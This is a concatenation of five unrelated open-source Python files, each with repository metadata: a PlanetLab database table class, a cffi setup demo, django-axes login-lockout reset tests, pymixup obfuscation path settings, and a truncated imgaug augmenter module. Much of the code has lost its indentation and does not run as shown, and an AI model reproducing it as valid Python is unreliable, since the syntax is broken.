# Functions for interacting with the network_types table in the database
#
# Mark Huang <mlhuang@cs.princeton.edu>
# Copyright (C) 2006 The Trustees of Princeton University
#
from PLC.Faults import *
from PLC.Parameter import Parameter
from PLC.Table import Row, Table
class NetworkType(Row):
"""
Representation of a row in the network_types table. To use,
instantiate with a dict of values.
"""
table_name = 'network_types'
primary_key = 'type'
join_tables = ['interfaces']
fields = {
'type': Parameter(str, "Network type", max = 20),
}
def validate_type(self, name):
# Make sure name is not blank
if not len(name):
raise PLCInvalidArgument("Network type must be specified")
        # Make sure network type does not already exist
conflicts = NetworkTypes(self.api, [name])
if conflicts:
raise PLCInvalidArgument("Network type name already in use")
return name
class NetworkTypes(Table):
"""
Representation of the network_types table in the database.
"""
def __init__(self, api, types = None):
Table.__init__(self, api, NetworkType)
sql = "SELECT %s FROM network_types" % \
", ".join(NetworkType.fields)
if types:
sql += " WHERE type IN (%s)" % ", ".join( [ api.db.quote (t) for t in types ] )
self.selectall(sql)
|
dreibh/planetlab-lxc-plcapi
|
PLC/NetworkTypes.py
|
Python
|
bsd-3-clause
| 1,417 | 0.008469 |
from setuptools import setup
setup(
name="example",
version="0.1",
py_modules=["readdir"],
setup_requires=["cffi>=1.0.dev0"],
cffi_modules=["readdir_build.py:ffi"],
install_requires=["cffi>=1.0.dev0"],
zip_safe=False,
)
|
hipnusleo/laserjet
|
resource/pypi/cffi-1.9.1/demo/readdir_setup.py
|
Python
|
apache-2.0
| 260 | 0 |
from unittest.mock import patch
from django.http import HttpRequest
from django.test import override_settings
from django.utils.timezone import now
from axes.attempts import get_cool_off_threshold
from axes.models import AccessAttempt
from axes.utils import reset, reset_request
from tests.base import AxesTestCase
class GetCoolOffThresholdTestCase(AxesTestCase):
@override_settings(AXES_COOLOFF_TIME=42)
def test_get_cool_off_threshold(self):
timestamp = now()
with patch("axes.attempts.now", return_value=timestamp):
attempt_time = timestamp
threshold_now = get_cool_off_threshold(attempt_time)
attempt_time = None
threshold_none = get_cool_off_threshold(attempt_time)
self.assertEqual(threshold_now, threshold_none)
@override_settings(AXES_COOLOFF_TIME=None)
def test_get_cool_off_threshold_error(self):
with self.assertRaises(TypeError):
get_cool_off_threshold()
class ResetTestCase(AxesTestCase):
def test_reset(self):
self.create_attempt()
reset()
self.assertFalse(AccessAttempt.objects.count())
def test_reset_ip(self):
self.create_attempt(ip_address=self.ip_address)
reset(ip=self.ip_address)
self.assertFalse(AccessAttempt.objects.count())
def test_reset_username(self):
self.create_attempt(username=self.username)
reset(username=self.username)
self.assertFalse(AccessAttempt.objects.count())
class ResetResponseTestCase(AxesTestCase):
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
IP_2 = "127.1.0.2"
def setUp(self):
super().setUp()
self.create_attempt()
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_2)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_2)
self.request = HttpRequest()
def test_reset(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
def test_reset_username(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip_username(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_user_failures(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_user_failures(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_user_or_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_user_or_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 2)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_user_and_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_ip_user_and_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
    @override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_ip_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
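# Quick reference (sketch, mirroring the API exercised above):
#   reset()                          # delete all AccessAttempt rows
#   reset(ip="127.1.0.1")            # delete attempts from one IP
#   reset(username="foo_username")   # delete attempts for one username
#   reset_request(request)           # reset based on the request's IP/username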
| jazzband/django-axes | tests/test_attempts.py | Python | mit | 5,846 | 0 |
from os.path import expanduser
######################
# Common project files
######################
# These are files, packages, and folders that will be copied from the
# development folder to the destination obfuscated project.
######################
# Python packages to obfuscate.
obfuscated_packages = [
'controller',
'db',
'dbdata',
'logic',
'migrations',
'platform_api',
'tests',
'view'
]
# Non-python folders and Python packages that are not obfuscated.
# Note: Tests are a special case: both obfuscated and unobfuscated versions
# are desired.
unobfuscated_folders = [
'csvlite',
'fonts',
'help',
'images', 'initial_data', 'international',
'kivygraph',
'tests',
]
# Required files or types in the project directory (that is, the base
# directory in which all the common packages exist) that must be
# obfuscated. For example, main.py is not in any of the common packages, but
# should be obfuscated and included in the project, so *.py (or alternatively,
# main.py) is included here.
obfuscated_root_files = [
'*.kv',
'*.py',
]
# Required files or types in the project directory that should not be
# obfuscated.
unobfuscated_root_files = [
'*.ini',
'*.txt',
]
#####################
# Default directories
#####################
# A project is moved through directories as follows:
# 1. It is copied into IMPORTED (use import_project/fabfile.py).
# 2. The IMPORTED project is obfuscated and written into OBFUSCATED (run
# pymixup.py).
# 3. When an obfuscated project is ready to test, it is copied into
# EXPORTED for a particular platform (e.g., for ios, use
# export_ios/fabfile.py).
# If no platform is specified, it will be copied into a folder called
# "default".
# 4. When an exported project is deployed, it is copied into DEPLOYED under
# its version number.
#
# Note that files in IMPORTED, OBFUSCATED, and EXPORTED are overwritten with
# each refresh from the development project. When a project is deployed,
# however, a permanent copy is retained under its version number.
#####################
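# Illustrative end-to-end paths (added for clarity; assumes the defaults
# below, the android platform and version 1.3.2):
#   ~/projects/IMPORTED/MyProject
#   ~/projects/OBFUSCATED/MyProject/android
#   ~/projects/EXPORTED/MyProject/android
#   ~/projects/DEPLOYED/MyProject/android/1.3.2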
# Project name. This should be the name of the last folder in the project
# path. The name is appended to the directories below.
project_name = 'MyProject'
# The base directory of the project to obfuscate.
# For example, the base directory of a project in '~/projects/MyProject' would
# be '~/projects'
project_base_dir = expanduser('~/PycharmProjects')
# The directory to copy the imported development project files to.
# Make sure this base directory exists; the fabfile scripts expect it.
# The project_name will be appended to the directory.
# For example, specify '~/projects/IMPORTED' to have the files from the
# project MyProject copied into '~/projects/IMPORTED/MyProject'.
imported_dir = expanduser('~/projects/IMPORTED')
# The directory to write the obfuscated files to.
# Make sure this base directory exists; the fabfile scripts expect it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/OBFUSCATED' is specified, then the project
# MyProject obfuscated for the android platform will be placed in
# '~/projects/OBFUSCATED/MyProject/android'.
obfuscated_dir = expanduser('~/projects/OBFUSCATED')
# The directory to write the exported files to.
# Make sure this base directory exists; the fabfile scripts expect it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/EXPORTED' is specified, then the project
# MyProject exported for the android platform will be placed in
# '~/projects/EXPORTED/MyProject/android'.
exported_dir = expanduser('~/projects/EXPORTED')
# The directory to write the deployed files to.
# Make sure this base directory exists; the fabfile scripts expect it.
# For example, if '~/projects/DEPLOYED' is specified, then the project
# MyProject deployed for the android platform for version 1.3.2 will be placed
# in '~/projects/DEPLOYED/MyProject/android/1.3.2'.
deployed_dir = expanduser('~/projects/DEPLOYED')
# The directory that contains extra files and folders needed for the project.
extras_dir = expanduser('~/projects/EXTRAS')
| rdevost/pymixup | common/settings.py | Python | mit | 4,238 | 0 |
from __future__ import print_function, division, absolute_import
from . import imgaug as ia
from .parameters import StochasticParameter, Deterministic, Binomial, Choice, DiscreteUniform, Normal, Uniform
from abc import ABCMeta, abstractmethod
import random
import numpy as np
import copy as copy_module
import re
import math
from scipy import misc, ndimage
from skimage import transform as tf, segmentation, measure
import itertools
import cv2
import six
import six.moves as sm
import types
"""
TODOs
- check if all get_parameters() implementations really return all parameters.
- Add Alpha augmenter
- Add WithChannels augmenter
- Add SpatialDropout augmenter
- Add CoarseDropout shortcut function
- Add Hue and Saturation augmenters
"""
@six.add_metaclass(ABCMeta)
class Augmenter(object):
"""Base class for Augmenter objects
Parameters
----------
name : string, optional
Name given to an Augmenter object
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, name=None, deterministic=False, random_state=None):
super(Augmenter, self).__init__()
if name is None:
self.name = "Unnamed%s" % (self.__class__.__name__,)
else:
self.name = name
self.deterministic = deterministic
if random_state is None:
if self.deterministic:
self.random_state = ia.new_random_state()
else:
self.random_state = ia.current_random_state()
elif isinstance(random_state, np.random.RandomState):
self.random_state = random_state
else:
self.random_state = np.random.RandomState(random_state)
self.activated = True
def augment_batches(self, batches, hooks=None):
"""Augment images, batch-wise
Parameters
----------
batches : list of array-likes, each of shape (num_samples, height, width, channels)
list of image batches to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
augmented_batches : list of array-likes, each of shape (num_samples, height, width, channels)
corresponding batches of augmented images
"""
assert isinstance(batches, list)
return [self.augment_images(batch, hooks=hooks) for batch in batches]
def augment_image(self, image, hooks=None):
"""Augment a single image
Parameters
----------
image : array-like, shape = (height, width, channels)
The image to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
img : array-like, shape = (height, width, channels)
The corresponding augmented image
"""
assert len(image.shape) == 3, "Expected image to have shape (height, width, channels), got shape %s." % (image.shape,)
return self.augment_images([image], hooks=hooks)[0]
def augment_images(self, images, parents=None, hooks=None):
"""Augment multiple images
Parameters
----------
images : array-like, shape = (num_samples, height, width, channels) or
a list of images (particularly useful for images of various
dimensions)
images to augment
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
images_result : array-like, shape = (num_samples, height, width, channels)
corresponding augmented images
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksImages()
if ia.is_np_array(images):
assert len(images.shape) == 4, "Expected 4d array of form (N, height, width, channels), got shape %s." % (str(images.shape),)
assert images.dtype == np.uint8, "Expected dtype uint8 (with value range 0 to 255), got dtype %s." % (str(images.dtype),)
images_tf = images
elif ia.is_iterable(images):
if len(images) > 0:
assert all([len(image.shape) == 3 for image in images]), "Expected list of images with each image having shape (height, width, channels), got shapes %s." % ([image.shape for image in images],)
assert all([image.dtype == np.uint8 for image in images]), "Expected dtype uint8 (with value range 0 to 255), got dtypes %s." % ([str(image.dtype) for image in images],)
images_tf = list(images)
else:
raise Exception("Expected list/tuple of numpy arrays or one numpy array, got %s." % (type(images),))
if isinstance(images_tf, list):
images_copy = [np.copy(image) for image in images]
else:
images_copy = np.copy(images)
images_copy = hooks.preprocess(images_copy, augmenter=self, parents=parents)
if hooks.is_activated(images_copy, augmenter=self, parents=parents, default=self.activated):
if len(images) > 0:
images_result = self._augment_images(
images_copy,
random_state=ia.copy_random_state(self.random_state),
parents=parents,
hooks=hooks
)
self.random_state.uniform()
else:
images_result = images_copy
else:
images_result = images_copy
images_result = hooks.postprocess(images_result, augmenter=self, parents=parents)
if self.deterministic:
self.random_state.set_state(state_orig)
if isinstance(images_result, list):
assert all([image.dtype == np.uint8 for image in images_result]), "Expected list of dtype uint8 as augmenter result, got %s." % ([image.dtype for image in images_result],)
else:
assert images_result.dtype == np.uint8, "Expected dtype uint8 as augmenter result, got %s." % (images_result.dtype,)
return images_result
@abstractmethod
def _augment_images(self, images, random_state, parents, hooks):
raise NotImplementedError()
def augment_keypoints(self, keypoints_on_images, parents=None, hooks=None):
"""Augment image keypoints
Parameters
----------
keypoints_on_images : # TODO
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
keypoints_on_images_result : # TODO
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksKeypoints()
assert ia.is_iterable(keypoints_on_images)
assert all([isinstance(keypoints_on_image, ia.KeypointsOnImage) for keypoints_on_image in keypoints_on_images])
keypoints_on_images_copy = [keypoints_on_image.deepcopy() for keypoints_on_image in keypoints_on_images]
keypoints_on_images_copy = hooks.preprocess(keypoints_on_images_copy, augmenter=self, parents=parents)
if hooks.is_activated(keypoints_on_images_copy, augmenter=self, parents=parents, default=self.activated):
if len(keypoints_on_images_copy) > 0:
keypoints_on_images_result = self._augment_keypoints(
keypoints_on_images_copy,
random_state=ia.copy_random_state(self.random_state),
parents=parents,
hooks=hooks
)
self.random_state.uniform()
else:
keypoints_on_images_result = keypoints_on_images_copy
else:
keypoints_on_images_result = keypoints_on_images_copy
keypoints_on_images_result = hooks.postprocess(keypoints_on_images_result, augmenter=self, parents=parents)
if self.deterministic:
self.random_state.set_state(state_orig)
return keypoints_on_images_result
@abstractmethod
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
raise NotImplementedError()
# TODO most of the code of this function could be replaced with ia.draw_grid()
def draw_grid(self, images, rows, cols):
if ia.is_np_array(images):
if len(images.shape) == 4:
images = [images[i] for i in range(images.shape[0])]
elif len(images.shape) == 3:
images = [images]
elif len(images.shape) == 2:
images = [images[:, :, np.newaxis]]
else:
raise Exception("Unexpected images shape, expected 2-, 3- or 4-dimensional array, got shape %s." % (images.shape,))
assert isinstance(images, list)
det = self if self.deterministic else self.to_deterministic()
augs = []
for image in images:
augs.append(det.augment_images([image] * (rows * cols)))
augs_flat = list(itertools.chain(*augs))
cell_height = max([image.shape[0] for image in images] + [image.shape[0] for image in augs_flat])
cell_width = max([image.shape[1] for image in images] + [image.shape[1] for image in augs_flat])
width = cell_width * cols
height = cell_height * (rows * len(images))
grid = np.zeros((height, width, 3))
for row_idx in range(rows):
for img_idx, image in enumerate(images):
for col_idx in range(cols):
image_aug = augs[img_idx][(row_idx * cols) + col_idx]
cell_y1 = cell_height * (row_idx * len(images) + img_idx)
cell_y2 = cell_y1 + image_aug.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image_aug.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image_aug
return grid
def show_grid(self, images, rows, cols):
"""Quickly show examples results of the applied augmentation
Parameters
----------
images : array-like, shape = (num_samples, height, width, channels) or
a list of images (particularly useful for images of various
dimensions)
images to augment
rows : integer.
number of rows in the grid
cols : integer
number of columns in the grid
"""
grid = self.draw_grid(images, rows, cols)
misc.imshow(grid)
def to_deterministic(self, n=None):
""" # TODO
"""
if n is None:
return self.to_deterministic(1)[0]
else:
return [self._to_deterministic() for _ in sm.xrange(n)]
def _to_deterministic(self):
""" # TODO
"""
aug = self.copy()
aug.random_state = ia.new_random_state()
aug.deterministic = True
return aug
def reseed(self, deterministic_too=False, random_state=None):
"""For reseeding the internal random_state
Parameters
----------
deterministic_too : boolean, optional(default=False)
# TODO
random_state : np.random.RandomState instance, optional(default=None)
random seed generator
"""
if random_state is None:
random_state = ia.current_random_state()
elif isinstance(random_state, np.random.RandomState):
pass # just use the provided random state without change
else:
random_state = ia.new_random_state(random_state)
if not self.deterministic or deterministic_too:
seed = random_state.randint(0, 10**6, 1)[0]
self.random_state = ia.new_random_state(seed)
for lst in self.get_children_lists():
for aug in lst:
aug.reseed(deterministic_too=deterministic_too, random_state=random_state)
@abstractmethod
def get_parameters(self):
raise NotImplementedError()
def get_children_lists(self):
return []
def find_augmenters(self, func, parents=None, flat=True):
""" # TODO
"""
if parents is None:
parents = []
result = []
if func(self, parents):
result.append(self)
subparents = parents + [self]
for lst in self.get_children_lists():
for aug in lst:
found = aug.find_augmenters(func, parents=subparents, flat=flat)
if len(found) > 0:
if flat:
result.extend(found)
else:
result.append(found)
return result
def find_augmenters_by_name(self, name, regex=False, flat=True):
"""Find augmenter(s) by name
Parameters
----------
name : string
name of the augmenter to find
regex : regular Expression, optional(default=False)
Regular Expression for searching the augmenter
flat : boolean, optional(default=True)
# TODO
Returns
-------
found augmenter instance
"""
return self.find_augmenters_by_names([name], regex=regex, flat=flat)
def find_augmenters_by_names(self, names, regex=False, flat=True):
"""Find augmenters by names
Parameters
----------
names : list of strings
names of the augmenter to find
regex : regular Expression, optional(default=False)
Regular Expression for searching the augmenter
flat : boolean, optional(default=True)
# TODO
Returns
-------
found augmenter instance(s)
"""
if regex:
def comparer(aug, parents):
for pattern in names:
if re.match(pattern, aug.name):
return True
return False
return self.find_augmenters(comparer, flat=flat)
else:
return self.find_augmenters(lambda aug, parents: aug.name in names, flat=flat)
def remove_augmenters(self, func, copy=True, noop_if_topmost=True):
"""Remove Augmenters from the list of augmenters
Parameters
----------
func : # TODO
copy : boolean, optional(default=True)
whether to remove augmenters from a deep copy of this augmenter (True) or in place (False)
noop_if_topmost : boolean, optional(default=True)
if True and the topmost augmenter itself matches func, a Noop
instance is returned instead of None
Returns
-------
aug : removed augmenter object
"""
if func(self, []):
if not copy:
raise Exception("Inplace removal of topmost augmenter requested, which is currently not possible.")
if noop_if_topmost:
return Noop()
else:
return None
else:
aug = self if not copy else self.deepcopy()
aug.remove_augmenters_inplace(func, parents=[])
return aug
def remove_augmenters_inplace(self, func, parents):
"""Inplace removal of augmenters
Parameters
----------
func : # TODO
parents : # TODO
"""
subparents = parents + [self]
for lst in self.get_children_lists():
to_remove = []
for i, aug in enumerate(lst):
if func(aug, subparents):
to_remove.append((i, aug))
for count_removed, (i, aug) in enumerate(to_remove):
# self._remove_augmenters_inplace_from_list(lst, aug, i, i - count_removed)
del lst[i - count_removed]
for aug in lst:
aug.remove_augmenters_inplace(func, subparents)
# TODO
# def to_json(self):
# pass
def copy(self):
"""Obtain a copy"""
return copy_module.copy(self)
def deepcopy(self):
"""Obtain a deep copy"""
return copy_module.deepcopy(self)
def __repr__(self):
return self.__str__()
def __str__(self):
params = self.get_parameters()
params_str = ", ".join([param.__str__() for param in params])
return "%s(name=%s, parameters=[%s], deterministic=%s)" % (self.__class__.__name__, self.name, params_str, self.deterministic)
class Sequential(Augmenter, list):
"""Sequential class is used to apply a number of transformations in an
ordered / random sequence
It is essentially an Augmenter comprising multiple Augmenters
Parameters
----------
children : optional(default=None)
random_order : boolean, optional(default=False)
whether to apply the listed transformations in a random order
name : string, optional(default=None)
name of the object
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, children=None, random_order=False, name=None, deterministic=False, random_state=None):
Augmenter.__init__(self, name=name, deterministic=deterministic, random_state=random_state)
list.__init__(self, children if children is not None else [])
self.random_order = random_order
def _augment_images(self, images, random_state, parents, hooks):
if hooks.is_propagating(images, augmenter=self, parents=parents, default=True):
if self.random_order:
# for augmenter in self.children:
for index in random_state.permutation(len(self)):
images = self[index].augment_images(
images=images,
parents=parents + [self],
hooks=hooks
)
else:
# for augmenter in self.children:
for augmenter in self:
images = augmenter.augment_images(
images=images,
parents=parents + [self],
hooks=hooks
)
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
if hooks.is_propagating(keypoints_on_images, augmenter=self, parents=parents, default=True):
if self.random_order:
for index in random_state.permutation(len(self)):
keypoints_on_images = self[index].augment_keypoints(
keypoints_on_images=keypoints_on_images,
parents=parents + [self],
hooks=hooks
)
else:
for augmenter in self:
keypoints_on_images = augmenter.augment_keypoints(
keypoints_on_images=keypoints_on_images,
parents=parents + [self],
hooks=hooks
)
return keypoints_on_images
def _to_deterministic(self):
augs = [aug.to_deterministic() for aug in self]
seq = self.copy()
seq[:] = augs
seq.random_state = ia.new_random_state()
seq.deterministic = True
return seq
def get_parameters(self):
return []
def add(self, augmenter):
"""Add an additional augmenter"""
self.append(augmenter)
def get_children_lists(self):
"""Return all the children augmenters"""
return [self]
def __str__(self):
# augs_str = ", ".join([aug.__str__() for aug in self.children])
augs_str = ", ".join([aug.__str__() for aug in self])
return "Sequential(name=%s, augmenters=[%s], deterministic=%s)" % (self.name, augs_str, self.deterministic)
class Sometimes(Augmenter):
"""Sometimes is an Augmenter that augments according to some probability
Given the probability "p", only a certain number of images will be transformed
Parameters
----------
p : float, optional(default=0.5)
determines the probability with which the associated Augmentation
will be applied, e.g. a value of 0.5 augments roughly 50% of the image
samples that are up for Augmentation
then_list : optional(default=None)
# TODO
else_list : optional(default=None)
# TODO
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p=0.5, then_list=None, else_list=None, name=None, deterministic=False, random_state=None):
super(Sometimes, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_float(p) or ia.is_single_integer(p):
assert 0 <= p <= 1
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected float/int in range [0, 1] or StochasticParameter as p, got %s." % (type(p),))
if then_list is None:
self.then_list = Sequential([], name="%s-then" % (self.name,))
elif ia.is_iterable(then_list):
self.then_list = Sequential(then_list, name="%s-then" % (self.name,))
elif isinstance(then_list, Augmenter):
self.then_list = Sequential([then_list], name="%s-then" % (self.name,))
else:
raise Exception("Expected None, Augmenter or list/tuple as then_list, got %s." % (type(then_list),))
if else_list is None:
self.else_list = Sequential([], name="%s-else" % (self.name,))
elif ia.is_iterable(else_list):
self.else_list = Sequential(else_list, name="%s-else" % (self.name,))
elif isinstance(else_list, Augmenter):
self.else_list = Sequential([else_list], name="%s-else" % (self.name,))
else:
raise Exception("Expected None, Augmenter or list/tuple as else_list, got %s." % (type(else_list),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
if hooks.is_propagating(images, augmenter=self, parents=parents, default=True):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
# create lists/arrays of images for if and else lists (one for each)
indices_then_list = np.where(samples == 1)[0] # np.where returns tuple(array([0, 5, 9, ...])) or tuple(array([]))
indices_else_list = np.where(samples == 0)[0]
if isinstance(images, list):
images_then_list = [images[i] for i in indices_then_list]
images_else_list = [images[i] for i in indices_else_list]
else:
images_then_list = images[indices_then_list]
images_else_list = images[indices_else_list]
# augment according to if and else list
result_then_list = self.then_list.augment_images(
images=images_then_list,
parents=parents + [self],
hooks=hooks
)
result_else_list = self.else_list.augment_images(
images=images_else_list,
parents=parents + [self],
hooks=hooks
)
# map results of if/else lists back to their initial positions (in "images" variable)
result = [None] * len(images)
for idx_result_then_list, idx_images in enumerate(indices_then_list):
result[idx_images] = result_then_list[idx_result_then_list]
for idx_result_else_list, idx_images in enumerate(indices_else_list):
result[idx_images] = result_else_list[idx_result_else_list]
# if input was a list, keep the output as a list too,
# otherwise it was a numpy array, so make the output a numpy array too
if not isinstance(images, list):
result = np.array(result, dtype=np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
# TODO this is mostly copy pasted from _augment_images, make dry
result = keypoints_on_images
if hooks.is_propagating(keypoints_on_images, augmenter=self, parents=parents, default=True):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
# create lists/arrays of images for if and else lists (one for each)
indices_then_list = np.where(samples == 1)[0] # np.where returns tuple(array([0, 5, 9, ...])) or tuple(array([]))
indices_else_list = np.where(samples == 0)[0]
images_then_list = [keypoints_on_images[i] for i in indices_then_list]
images_else_list = [keypoints_on_images[i] for i in indices_else_list]
# augment according to if and else list
result_then_list = self.then_list.augment_keypoints(
keypoints_on_images=images_then_list,
parents=parents + [self],
hooks=hooks
)
result_else_list = self.else_list.augment_keypoints(
keypoints_on_images=images_else_list,
parents=parents + [self],
hooks=hooks
)
# map results of if/else lists back to their initial positions (in "images" variable)
result = [None] * len(keypoints_on_images)
for idx_result_then_list, idx_images in enumerate(indices_then_list):
result[idx_images] = result_then_list[idx_result_then_list]
for idx_result_else_list, idx_images in enumerate(indices_else_list):
result[idx_images] = result_else_list[idx_result_else_list]
return result
def _to_deterministic(self):
aug = self.copy()
aug.then_list = aug.then_list.to_deterministic()
aug.else_list = aug.else_list.to_deterministic()
aug.deterministic = True
aug.random_state = ia.new_random_state()
return aug
def get_parameters(self):
return [self.p]
def get_children_lists(self):
return [self.then_list, self.else_list]
def __str__(self):
return "Sometimes(p=%s, name=%s, then_list=[%s], else_list=[%s], deterministic=%s)" % (self.p, self.name, self.then_list, self.else_list, self.deterministic)
class Noop(Augmenter):
"""Noop is an Augmenter that does nothing
Parameters
----------
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, name=None, deterministic=False, random_state=None):
#Augmenter.__init__(self, name=name, deterministic=deterministic, random_state=random_state)
super(Noop, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
def _augment_images(self, images, random_state, parents, hooks):
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return []
class Lambda(Augmenter):
""" # TODO
"""
def __init__(self, func_images, func_keypoints, name=None, deterministic=False, random_state=None):
#Augmenter.__init__(self, name=name, deterministic=deterministic, random_state=random_state)
super(Lambda, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.func_images = func_images
self.func_keypoints = func_keypoints
def _augment_images(self, images, random_state, parents, hooks):
return self.func_images(images, random_state, parents=parents, hooks=hooks)
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
result = self.func_keypoints(keypoints_on_images, random_state, parents=parents, hooks=hooks)
assert isinstance(result, list)
assert all([isinstance(el, ia.KeypointsOnImage) for el in result])
return result
def get_parameters(self):
return []
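# Usage sketch (illustrative): a Lambda that inverts image intensities and
# passes keypoints through unchanged:
#   aug = Lambda(
#       func_images=lambda images, random_state, parents, hooks: [255 - img for img in images],
#       func_keypoints=lambda kps, random_state, parents, hooks: kps
#   )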
def AssertLambda(func_images, func_keypoints, name=None, deterministic=False, random_state=None):
def func_images_assert(images, random_state, parents, hooks):
assert func_images(images, random_state, parents=parents, hooks=hooks)
return images
def func_keypoints_assert(keypoints_on_images, random_state, parents, hooks):
assert func_keypoints(keypoints_on_images, random_state, parents=parents, hooks=hooks)
return keypoints_on_images
if name is None:
name = "UnnamedAssertLambda"
return Lambda(func_images_assert, func_keypoints_assert, name=name, deterministic=deterministic, random_state=random_state)
def AssertShape(shape, check_images=True, check_keypoints=True, name=None, deterministic=False, random_state=None):
assert len(shape) == 4, "Expected shape to have length 4, got %d with shape: %s." % (len(shape), str(shape))
def compare(observed, expected, dimension, image_index):
if expected is not None:
if ia.is_single_integer(expected):
